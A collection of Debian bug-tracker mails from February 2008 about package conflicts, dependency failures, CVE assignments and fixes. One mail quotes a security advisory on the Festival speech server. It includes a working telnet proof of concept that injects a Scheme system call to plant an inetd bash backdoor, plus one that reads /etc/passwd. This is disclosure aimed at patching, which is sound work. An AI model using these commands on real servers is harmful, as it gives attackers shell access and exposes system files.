Processed: your mail
Processing commands for [EMAIL PROTECTED]: forwarded 461331 http://www.cups.org/str.php?L2711 Bug#461331: cupsys: Sharing printers via web interface crashes cups server Bug#462069: cupsys: enabling printer sharing breaks the server config file Noted your statement that Bug has been forwarded to http://www.cups.org/str.php?L2711. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466484: unresolved file conflict with extra-xdg-menus
On Tue, Feb 19, 2008 at 02:57:57PM +1100, Drew Parsons wrote: Package: hamradiomenus Version: 1.1 Severity: serious Although hamradiomenus Depends: extra-xdg-menus (= 1.0-2), there is nevertheless a file conflict which prevents upgrading. extra-xdg-menus cannot upgrade to 1.0-2 because hamradiomenus already has /etc/xdg/menus/applications-merged/hamradio.menu, and therefore hamradiomenus is broken since it depends of extra-xdg-menus (= 1.0-2). Hmm. I'm confused; extra-xdg-menus conflicts and replaces the old version of hamradiomenus, so I expected this would work. Obvious I need to study the relevant documentation some more. thanks, Hamish -- Hamish Moffatt VK3SB [EMAIL PROTECTED] [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: severity of 466459 is important
Processing commands for [EMAIL PROTECTED]: # Automatically generated email from bts, devscripts version 2.10.16 severity 466459 important Bug#466459: xserver-xorg-video-intel: intel driver loose/crash video at random Severity set to `important' from `critical' End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466519: svn client doesn't work: Could not get next bucket brigade + Invalid or incomplete multibyte or wid...: random no commit, no update
Package: libc6 Version: 2.3.6.ds1-13etch5 Severity: grave Summary: svn was working perfectly. The repository isn't huge (~500 commit). Now when I commit I get: Could not get next bucket brigade (server side) when I update I get: client denied by server configuration: /var/www/ Could not fetch resource information. (84)Invalid or incomplete multibyte or wide character: Requests for a collection must have a trailing slash on the URI. On the client side I get: REPORT di '/svn/main/!svn/vcc/default': 400 Bad Request I did a svnadmin verify and svnadmin recover and everything looked fine on the server. I did try fsfsverify.py on all revs too. Sometimes backing up a file on the local copy, forcing a delete, adding the file back works... sometimes it doesn't. I've been able to commit file one by one, some get committed with no extra hassle, some need this backup/delete/add process, some just can't be committed. I did try to make a commit from other boxes and they worked... I did a co from other boxes and they worked too. the server is a debian sarge (pentium) Debian sarge (Apache/2.0.54 (Debian GNU/Linux) DAV/2 SVN/1.1.4) the client is a debian etch (dual Xeon) svn, versione 1.4.2 (r22196) compilato Nov 10 2006, 17:39:50 Nothing was changed on the server, most recent update were on the client (etch) and coincidentally I haven't been able to use svn starting from the below update on the client. linux-image-2.6-686 2.6.18+6etch2 - 2.6.18+6etch3 apache2 2.2.3-4+etch3 - 2.2.3-4+etch4 apache2-mpm-prefork 2.2.3-4+etch3 - 2.2.3-4+etch4 apache2-utils 2.2.3-4+etch3 - 2.2.3-4+etch4 apache2.2-common 2.2.3-4+etch3 - 2.2.3-4+etch4 cpio 2.6-17 - 2.6-18 libc6 2.3.6.ds1-13etch4 - 2.3.6.ds1-13etch5 libc6-dev 2.3.6.ds1-13etch4 - 2.3.6.ds1-13etch5 libc6-xen 2.3.6.ds1-13etch4 - 2.3.6.ds1-13etch5 locales 2.3.6.ds1-13etch4 - 2.3.6.ds1-13etch5 and nothing has changed on the server. I haven't been able to do much tests from other clients but till now all commit, updates and checkout from different clients worked. So it seems the problem was introduced by the updates above on the client. Could be related to this: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465583 but the client has ipv6 loaded... -- Ivan Sergio Borgonovo http://www.webthatworks.it -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466395: marked as done (gpgp: Does not install: five dependency failures)
Your message dated Tue, 19 Feb 2008 11:42:09 +0100 with message-id [EMAIL PROTECTED] and subject line has caused the Debian Bug report #466395, regarding gpgp: Does not install: five dependency failures to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 466395: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=466395 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: gpgp Version: 0.4-12+b1 Severity: grave Justification: renders package unusable With current testing and/or sid repositories, dependency failure causes installation to fail. gpgp: Depends: gdk-imlib11 but it is not going to be installed Depends: libgnome32 but it is not going to be installed Depends: libgnomesupport0 but it is not going to be installed Depends: libgnomeui32 but it is not going to be installed Depends: libgtk1.2 but it is not going to be installed -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.24-1-686 (SMP w/2 CPU cores) Locale: LANG=en_AU.UTF-8, LC_CTYPE=en_AU.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash ---End Message--- ---BeginMessage--- -- Tim Richardson [EMAIL PROTECTED] ---End Message---
Processed: Re: Bug#466395: gpgp: Does not install: five dependency failures
Processing commands for [EMAIL PROTECTED]: tags 466395 + wontfix Bug#466395: gpgp: Does not install: five dependency failures There were no tags set. Tags added: wontfix thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Re: Bug#466186: missing library libldap_r-2.4.so.2 (causes Wine FTBFS)
Processing commands for [EMAIL PROTECTED]: retitle 466186 missing library libldap_r-2.4.so.2 (causes Wine FTBFS) Bug#466186: FTBFS on amd64: missing library libldap_r-2.4.so.2 (for wldap32.dll.so) Changed Bug title to `missing library libldap_r-2.4.so.2 (causes Wine FTBFS)' from `FTBFS on amd64: missing library libldap_r-2.4.so.2 (for wldap32.dll.so)'. reassign 466186 ia32-libs 2.2 Bug#466186: missing library libldap_r-2.4.so.2 (causes Wine FTBFS) Bug reassigned from package `libwine-ldap' to `ia32-libs'. stop Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466186: missing library libldap_r-2.4.so.2 (causes Wine FTBFS)
retitle 466186 missing library libldap_r-2.4.so.2 (causes Wine FTBFS) reassign 466186 ia32-libs 2.2 stop OK, reassigning this to ia32-libs. Summary: * To support the current amd64 hack in the Wine packages, ia32-libs should: - fix #458013 (obviously), and also - add libldap_r-2.4.so.2 (libldap_r.so.2 exists, but is no longer used by lenny's libldap-dev) Alternatively, to support building Wine *without* the amd64 hack (and thus allow closing bug #381341), ia32-libs should: - fix #458013 (for libsane too, not just libxml2), and - add .so symlinks libpng12.so, libcups.so, libdbus-1.so - add .so.* files from libhal1, libxcomposite1 (plus their .so symlinks) I'm not really willing to remove the amd64 hack before these libraries can be compiled into Wine using ia32-libs or some other 32-bit-compatibility package. Additional libraries such as libssl, libjack, libcapi20, and unixodbc would be nice, but I'd probably be willing to remove the hack without those. Also, since linking to libfreetype.so.6 depends on having lib32z1-dev installed as well, it'd be nice if there was a way to not have to explicitly build-depend on it, but I can deal with that for now... -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466365: marked as done (rezound: package build-depends on fftw3, but links against fftw)
Your message dated Tue, 19 Feb 2008 10:47:11 + with message-id [EMAIL PROTECTED] and subject line Bug#466365: fixed in rezound 0.12.3beta-2 has caused the Debian Bug report #466365, regarding rezound: package build-depends on fftw3, but links against fftw to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 466365: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=466365 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: rezound Version: 0.12.3beta-1 Severity: serious Tags: patch Hi Günter! rezound has a Build-Depends against fftw3-dev, but the binary is linked against fftw2. I guess fftw2 is being pulled by some other package. with the patch linked here and a Build-Depends against libfftw3-dev, the binary should be correctly linked. http: //sourceforge.net/tracker/index.php?func=detailaid=1873893group_id=5056atid=305056 cheers, piem -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (1, 'experimental') Architecture: i386 (i686) Kernel: Linux 2.6.24-1-686 (SMP w/2 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages rezound depends on: ii fftw2 [fftw2-double] 2.1.3-20+b2 library for computing Fast Fourier ii libasound2 1.0.15-3 ALSA library ii libaudiofile0 0.2.6-7 Open-source version of SGI's audio ii libbz2-1.0 1.0.4-3 high-quality block-sorting file co ii libc6 2.7-8 GNU C Library: Shared libraries ii libcupsys2 1.3.5-1+b1Common UNIX Printing System(tm) - ii libflac++6 1.2.1-1.1 Free Lossless Audio Codec - C++ ru ii libflac8 1.2.1-1.1 Free Lossless Audio Codec - runtim ii libfontconfig1 2.5.0-2 generic font configuration library ii libfox1.4 1.4.34-1 The FOX C++ GUI Toolkit ii libfreetype6 2.3.5-1+b1FreeType 2 font engine, shared lib ii libgcc11:4.3-20080202-1 GCC support library ii libgl1-mesa-glx [libgl 7.0.2-4 A free implementation of the OpenG ii libglu1-mesa [libglu1] 7.0.2-4 The OpenGL utility library (GLU) ii libjack0 0.109.2-1 JACK Audio Connection Kit (librari ii libjpeg62 6b-14 The Independent JPEG Group's JPEG ii libogg01.1.3-3 Ogg Bitstream Library ii libpng12-0 1.2.15~beta5-3PNG library - runtime ii libsoundtouch1c2 1.3.0-2.1 sound stretching library ii libstdc++6 4.3-20080202-1The GNU Standard C++ Library v3 ii libtiff4 3.8.2-7 Tag Image File Format (TIFF) libra ii libvorbis0a1.2.0.dfsg-3 The Vorbis General Audio Compressi ii libvorbisenc2
Bug#466382: wyrd CVE id
retitle 466382 wyrd: CVE-2008-0806 insecure tempfile creation allows symlink attack thanks Hi, CVE-2008-0806 was assigned to this. == Name: CVE-2008-0806 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0806 Reference: CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=466382 Reference: BID:27848 Reference: URL:http://www.securityfocus.com/bid/27848 Reference: SECUNIA:29009 Reference: URL:http://secunia.com/advisories/29009 wyrd 1.4.3b allows local users to overwrite arbitrary files via a symlink attack on the wyrd-tmp.[USERID] temporary file. Kind regards Nico -- Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF For security reasons, all text in this mail is double-rot13 encrypted. pgpyrgihjmW5H.pgp Description: PGP signature
Processed: Re: Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Processing commands for [EMAIL PROTECTED]: retitle 466146 festival: CVE-2007-4074 default configuration allows unauthenticated remote code execution Bug#466146: festival: Default configuration allows unauthenticated remote code execution Changed Bug title to `festival: CVE-2007-4074 default configuration allows unauthenticated remote code execution' from `festival: Default configuration allows unauthenticated remote code execution'. (By the way, that Bug is currently marked as done.) thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466146: marked as done (festival: Default configuration allows unauthenticated remote code execution)
Your message dated Tue, 19 Feb 2008 08:47:08 + with message-id [EMAIL PROTECTED] and subject line Bug#466146: fixed in festival 1.96~beta-6 has caused the Debian Bug report #466146, regarding festival: Default configuration allows unauthenticated remote code execution to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 466146: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=466146 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: festival Version: 1.96~beta-5 Severity: critical Tags: security Justification: root security hole Nth Dimension Security Advisory (NDSA20080215) Date: 15th February 2008 Author: Tim Brown mailto:[EMAIL PROTECTED] URL: http://www.nth-dimension.org.uk/ / http://www.machine.org.uk/ Product: Festival 1.96:beta July 2004 http://www.cstr.ed.ac.uk/projects/festival.html Vendor: Centre for Speech Technology Research, University of Edinburgh http://www.cstr.ed.ac.uk/ Risk: Medium Summary The Festival server is vulnerable to unauthenticated remote code execution. Further research indicates that this vulnerability has already been reported as a local privilege escalation against both the Gentoo and SuSE GNU/Linux distributions. The remote form of this vulnerability was identified in 1.96~beta-5 as distributed in Debian unstable. Technical Details The Festival server which can be started using festival --server is vulnerable to unauthenticated remote command execution due to the inclusion of a scheme interpreter. It is possible to make use of standard scheme functions in order to execute further code, like so: $ telnet 10.0.0.1 1314 Trying 10.0.0.1... Connected to 10.0.0.1. (system echo ' stream tcp nowait festival /bin/bash /bin/bash -i' /tmp/backdoor.conf; /usr/sbin/inetd /tmp/backdoor.conf) Connection closed by foreign host. Whilst this is the most trivial way that the vulnerability can be exploited the inclusion of a scheme interpreter available without authentication allows for other vectors of attack. Scheme functions such as SayText and tts (which reads a file on the vulnerable system) pose particular interest, for example: $ telnet 10.0.0.1 1314 Trying 10.0.0.1... Connected to 10.0.0.1. (tts /etc/passwd nil) Whilst it is acknowledged that the inclusion of the scheme interpreter in this manner is entirely intentional, the default unsecure state of the server could be exploited particularly where the user is unaware of the servers existance. Solutions In order to completely protect against the vulnerability (in the short term), Nth Dimension recommend turning off the server or filtering connections to the affected port using a host based firewall. The server itself can be secured by applying the patches located at http://bugs.gentoo.org/show_bug.cgi?id=170477. This includes applying a default configuration which limits access to localhost and setting an optional password which prevents unauthenticated access. -- System Information: Debian Release: lenny/sid APT prefers oldstable APT policy: (500, 'oldstable'), (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental') Architecture: i386 (i686) Kernel: Linux 2.6.22-3-686 (SMP w/2 CPU cores) Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages festival depends on: ii adduser 3.105add and remove users and groups ii libaudiofile0 0.2.6-7 Open-source version of SGI's audio ii libc6 2.7-8GNU C Library: Shared libraries ii libesd0 0.2.36-3 Enlightened Sound Daemon - Shared ii libestools1.2 1:1.2.96~beta-2 Edinburgh Speech Tools Library ii libgcc1 1:4.3-20080202-1 GCC support library ii libncurses5 5.6+20080203-1 Shared libraries for terminal hand ii libstdc++6 4.3-20080202-1 The GNU Standard C++ Library v3 ii lsb-base3.1-24 Linux Standard Base 3.1 init scrip ii sgml-base 1.26 SGML infrastructure and SGML catal ii sysv-rc 2.86.ds1-53 System-V-like runlevel change mech Versions of packages festival recommends: ii festvox-kallpc16k [festival-v 1.4.0-5American English male speaker for -- no debconf information ---End Message--- ---BeginMessage--- Source: festival Source-Version: 1.96~beta-6 We believe that the bug you reported is fixed in the latest version of festival, which is due to be installed in the Debian FTP archive: festival-dev_1.96~beta-6_i386.deb to
Bug#462648: update-menu not working correctly
DBTS I corrected him. See attache. (NMU) package with this patch uploaded to: http://uvw.ru/debian/unstable/menu/ :) Please check it. signature.asc Description: Digital signature
Bug#466517: update-mime: don't ignore alternatives / text/html should use sensible-browser
Package: mime-support Version: 3.39-1 Severity: serious Justification: ignores local admin's preferences[1] --- Please enter the report below this line. --- Hello, I have set my alternatives[1] for x-www-browser and gnome-www-browser as follows: LANG=C /usr/sbin/update-alternatives --display x-www-browser x-www-browser - status is manual. link currently points to /usr/bin/iceweasel /usr/bin/xlinks2 - priority 69 slave x-www-browser.1.gz: /usr/share/man/man1/xlinks2.1.gz /usr/bin/iceweasel - priority 70 slave x-www-browser.1.gz: /usr/share/man/man1/iceweasel.1.gz /usr/bin/epiphany - priority 85 slave x-www-browser.1.gz: /usr/share/man/man1/epiphany.1.gz Current `best' version is /usr/bin/epiphany. LANG=C /usr/sbin/update-alternatives --display gnome-www-browser gnome-www-browser - status is manual. link currently points to /usr/bin/firefox /usr/bin/firefox - priority 70 slave gnome-www-browser.1.gz: /usr/share/man/man1/firefox.1.gz /usr/bin/iceweasel - priority 70 slave gnome-www-browser.1.gz: /usr/share/man/man1/iceweasel.1.gz /usr/bin/epiphany - priority 85 slave gnome-www-browser.1.gz: /usr/share/man/man1/epiphany.1.gz /usr/bin/galeon - priority 120 slave gnome-www-browser.1.gz: /usr/share/man/man1/galeon.1.gz Current `best' version is /usr/bin/galeon. Also, my BROWSER environment variable: env | grep BROW BROWSER=firefox %s And at this point, *by*pure*coincidence*, the mailcap info is somewhat correctly set, using iceweasel for html: grep -i 'text/html' /etc/mailcap text/html; /usr/bin/iceweasel '%s'; description=HTML Text; test=test -n $DISPLAY; nametemplate=%s.html text/html; /usr/bin/w3m -T text/html '%s'; needsterminal; description=HTML Text; nametemplate=%s.html text/html; /usr/bin/w3m -dump -T text/html '%s'; copiousoutput; description=HTML Text; nametemplate=%s.html text/html; /usr/bin/html2text '%s'; copiousoutput; description=HTML Text text/html; /usr/bin/sensible-browser '%s'; description=HTML Text; nametemplate=%s.html If I install also galeon, the damn thing breaks to pieces and all my alternatives and BROWSER settings are simply ignored (as they were before, but I was lucky): grep -i 'text/html' /etc/mailcap text/html; /usr/bin/galeon '%s'; description=HTML Text; test=test -n $DISPLAY; nametemplate=%s.html text/html; /usr/bin/iceweasel '%s'; description=HTML Text; test=test -n $DISPLAY; nametemplate=%s.html text/html; /usr/bin/w3m -T text/html '%s'; needsterminal; description=HTML Text; nametemplate=%s.html text/html; /usr/bin/w3m -dump -T text/html '%s'; copiousoutput; description=HTML Text; nametemplate=%s.html text/html; /usr/bin/html2text '%s'; copiousoutput; description=HTML Text text/html; /usr/bin/sensible-browser '%s'; description=HTML Text; nametemplate=%s.html Also, I suspect that if I remove and then install iceweasel I will get the desired effect, but this would mean I will always get as default the latest installed browser, which is wrong. I just tested this and, weirdly, no, this was not what happened - woohoo, more weird behaviour. As a fix I propose sensible-browser to be, by default and always, the first handler for text/html. Note that by doing this you are fixing also displaying html even on pure text consoles and respect the alternatives, at the same time. from sensible-browser(1): DESCRIPTION sensible-editor, sensible-pager and sensible-browser make sensible decisions on which editor, pager, and web browser to call, respectively. Programs in Debian can use these scripts as their default editor, pager, or web browser or emulate their behavior. Judging from the code from /usr/bin/sensible-browser, one can easily see that it will always do the right thing. Notes: - sensible-browser is part of the essential package debianutils, so there's no extra dep needed or something like that. - of course, mailcap.order can override this, as usual, but the default behaviour will no longer be broken. [1] http://www.debian.org/doc/debian-policy/ap-pkg-alternatives.html --- System information. --- Architecture: amd64 Kernel: Linux 2.6.24.2-bounty Debian Release: lenny/sid 900 testing security.debian.org 900 testing ftp.ro.debian.org 10 unstableftp.ro.debian.org --- Package information. --- Depends (Version) | Installed ===-+-=== | -- Regards, EddyP = Imagination is more important than knowledge A.Einstein -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
retitle 466146 festival: CVE-2007-4074 default configuration allows unauthenticated remote code execution thanks Hi Tim, * Tim Brown [EMAIL PROTECTED] [2008-02-17 04:18]: Package: festival Version: 1.96~beta-5 Severity: critical Tags: security Justification: root security hole Nth Dimension Security Advisory (NDSA20080215) Date: 15th February 2008 Author: Tim Brown mailto:[EMAIL PROTECTED] URL: http://www.nth-dimension.org.uk/ / http://www.machine.org.uk/ Product: Festival 1.96:beta July 2004 http://www.cstr.ed.ac.uk/projects/festival.html Vendor: Centre for Speech Technology Research, University of Edinburgh http://www.cstr.ed.ac.uk/ Risk: Medium [...] CVE-2007-4074 was assigned to this issue. == Name: CVE-2007-4074 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4074 Reference: CONFIRM:http://bugs.gentoo.org/show_bug.cgi?id=170477 Reference: GENTOO:GLSA-200707-10 Reference: URL:http://security.gentoo.org/glsa/glsa-200707-10.xml Reference: SUSE:SUSE-SR:2007:021 Reference: URL:http://lists.opensuse.org/opensuse-security-announce/2007-10/msg6.html Reference: BID:25069 Reference: URL:http://www.securityfocus.com/bid/25069 Reference: SECUNIA:26229 Reference: URL:http://secunia.com/advisories/26229 Reference: SECUNIA:27271 Reference: URL:http://secunia.com/advisories/27271 Reference: XF:gentoo-festival-privilege-escalation(35606) Reference: URL:http://xforce.iss.net/xforce/xfdb/35606 The default configuration of Centre for Speech Technology Research (CSTR) Festival 1.95 beta (aka 2.0 beta) on Gentoo Linux is run locally with elevated privileges without requiring authentication, which allows context-dependent attackers to execute arbitrary commands via the local daemon on port 1314, a different vulnerability than CVE-2001-0956. Kind regards Nico -- Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF For security reasons, all text in this mail is double-rot13 encrypted. pgpUqhVlCUsyi.pgp Description: PGP signature
Processed: Fixed upstream
Processing commands for [EMAIL PROTECTED]: tag 461331 + patch Bug#461331: cupsys: Sharing printers via web interface crashes cups server There were no tags set. Bug#462069: cupsys: enabling printer sharing breaks the server config file Tags added: patch tag 461331 + fixed-upstream Bug#461331: cupsys: Sharing printers via web interface crashes cups server Tags were: patch Bug#462069: cupsys: enabling printer sharing breaks the server config file Tags added: fixed-upstream forwarded 461331 http://www.cups.org/str.php?L2703 Bug#461331: cupsys: Sharing printers via web interface crashes cups server Bug#462069: cupsys: enabling printer sharing breaks the server config file Forwarded-to-address changed from http://www.cups.org/str.php?L2711 to http://www.cups.org/str.php?L2703. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#461331: Fixed upstream
tag 461331 + patch tag 461331 + fixed-upstream forwarded 461331 http://www.cups.org/str.php?L2703 thanks There is a patch available at http://www.cups.org/strfiles/2703/str2703.patch. -- Sam Morris [EMAIL PROTECTED] signature.asc Description: This is a digitally signed message part
Bug#466484: unresolved file conflict with extra-xdg-menus
* Hamish Moffatt [EMAIL PROTECTED] [2008 Feb 19 02:53 -0600]: On Tue, Feb 19, 2008 at 02:57:57PM +1100, Drew Parsons wrote: Package: hamradiomenus Version: 1.1 Severity: serious Although hamradiomenus Depends: extra-xdg-menus (= 1.0-2), there is nevertheless a file conflict which prevents upgrading. extra-xdg-menus cannot upgrade to 1.0-2 because hamradiomenus already has /etc/xdg/menus/applications-merged/hamradio.menu, and therefore hamradiomenus is broken since it depends of extra-xdg-menus (= 1.0-2). Hmm. I'm confused; extra-xdg-menus conflicts and replaces the old version of hamradiomenus, so I expected this would work. Obvious I need to study the relevant documentation some more. I saw the same thing happen. I merely purged hamradiomenus and and the new package installed. 73, de Nate -- The optimist proclaims that we live in the best of all possible worlds. The pessimist fears this is true. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466300: More information
Hi, [EMAIL PROTECTED]:/home/tritt# LC_ALL=C update-alternatives --display java java - status is manual. link currently points to /usr/lib/j2sdk1.5-sun/bin/java /usr/lib/j2sdk1.5-sun/bin/java - priority 315 slave java.1.gz: /usr/lib/j2sdk1.5-sun/man/man1/java.1.gz /usr/bin/gij-4.1 - priority 41 /usr/bin/gij-4.2 - priority 42 Current `best' version is /usr/lib/j2sdk1.5-sun/bin/java. [EMAIL PROTECTED]:/home/tritt# dir /usr/bin/java lrwxrwxrwx 1 root root 22 ene 7 2006 /usr/bin/java - /etc/alternatives/java Ok, and what is the JRE set in your OpenOffice.org options? Regards, Rene -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: wyrd CVE id
Processing commands for [EMAIL PROTECTED]: retitle 466382 wyrd: CVE-2008-0806 insecure tempfile creation allows symlink attack Bug#466382: wyrd: insecure tmpfile creation Changed Bug title to `wyrd: CVE-2008-0806 insecure tempfile creation allows symlink attack' from `wyrd: insecure tmpfile creation'. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Hi Tim, this is somehow strange, this CVE id was already fixed in 1.4.3-21 referring to the security tracker (see bug #435445 for reference). Did this fix got lost somewhere in the package history? Kind regards Nico -- Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF For security reasons, all text in this mail is double-rot13 encrypted. pgpCYdsqOEnbI.pgp Description: PGP signature
Bug#466300: More information
The same one as is the only one listed in openoffice-preferences-Java, jre 1.5 Thanks. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466484: unresolved file conflict with extra-xdg-menus
On Tue, 2008-02-19 at 19:47 +1100, Hamish Moffatt wrote: On Tue, Feb 19, 2008 at 02:57:57PM +1100, Drew Parsons wrote: Although hamradiomenus Depends: extra-xdg-menus (= 1.0-2), there is nevertheless a file conflict which prevents upgrading. extra-xdg-menus cannot upgrade to 1.0-2 because hamradiomenus already has /etc/xdg/menus/applications-merged/hamradio.menu, and therefore hamradiomenus is broken since it depends of extra-xdg-menus (= 1.0-2). Hmm. I'm confused; extra-xdg-menus conflicts and replaces the old version of hamradiomenus, so I expected this would work. I guess the problem must be that hamradiomenus Depends: extra-xdg-menus while still containing the same file as i. Did you mean to remove /etc/xdg/menus/applications-merged/hamradio.menu from hamradiomenus? Drew -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Tue, Feb 19, 2008 at 12:16:14PM +0100, Nico Golde wrote: Hi Tim, this is somehow strange, this CVE id was already fixed in 1.4.3-21 referring to the security tracker (see bug #435445 for reference). Did this fix got lost somewhere in the package history? Dear Nico, It appears that the troublesome issue of running festival as a less privileged user was handled in the last upload. However, what was not handled was the restriction of accesss to localhost by default, and the necessity to introduce a password for this purpose. The last upload, which Tim has checked a few times, introduces this feature, and thus, makes the security aspect a bit more complete. Hope this is fine. Thanks for the follow up. Kumar -- Kumar Appaiah, 458, Jamuna Hostel, Indian Institute of Technology Madras, Chennai - 600 036 signature.asc Description: Digital signature
Bug#456637: courier-imap: directory isn't owned by the correct uid/gid
Sebastian Dellit wrote: Package: courier-imap Version: 4.3.0.20081027-1 Followup-For: Bug #456637 After a upgrade I can't access my accounts with the imap protocol. When I access with The Bad I get the message: Fatal error: Account's mailbox directory is not owned by the correct uid or gid. When I access with squirrelmail I geht the message: error: connection aborted by the imap server. When I install the stable courier-imap package again, all works fine. Mismatches between ownership of the mailbox directory and the ownership retrieved from the account database can cause mysterious error messages. To prevent these a sanity check was added to Courier IMAP. Such mismatches trigger the following error on login: BYE [ALERT] Fatal error: Account's mailbox directory is not owned by the correct uid or gid The sanity check can be averted by setting IMAP_MAILBOX_SANITY_CHECK in /etc/courier/imapd to 0 and restart Courier IMAP. Regards Racke -- LinuXia Systems = http://www.linuxia.de/ Expert Interchange Consulting and System Administration ICDEVGROUP = http://www.icdevgroup.org/ Interchange Development Team -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466539: gnome-peercast: CVE-2007-6454 heap-based buffer overflow possibly leading to code execution
Package: gnome-peercast Version: 0.5.4-1.1 Severity: grave Tags: security Justification: user security hole Hi ! CVE-2007-6454 as been fixed for peercast, but since this package includes a static version of the code, the vulnerability still applies there. As a side note, I've already done a lot of things to try to fix this, but upstream seems not to care at all, and didn't maintain this package for 1 year (last upload was my NMU)... Romain -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.24-rc7-mactel (SMP w/2 CPU cores; PREEMPT) Locale: LANG=fr_FR, LC_CTYPE=fr_FR (charmap=ISO-8859-1) Shell: /bin/sh linked to /bin/bash -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466539: gnome-peercast: CVE-2007-6454 heap-based buffer overflow possibly leading to code execution
On Tuesday 19 February 2008 13:57, Romain Beauxis wrote: Package: gnome-peercast Version: 0.5.4-1.1 Severity: grave Tags: security Justification: user security hole Hi ! CVE-2007-6454 as been fixed for peercast, but since this package includes a static version of the code, the vulnerability still applies there. As a side note, I've already done a lot of things to try to fix this, but upstream seems not to care at all, and didn't maintain this package for 1 year (last upload was my NMU)... So am I right to conclude that we'd better remove this package rather than to try and fix it? Thijs pgpJRZyJWf49q.pgp Description: PGP signature
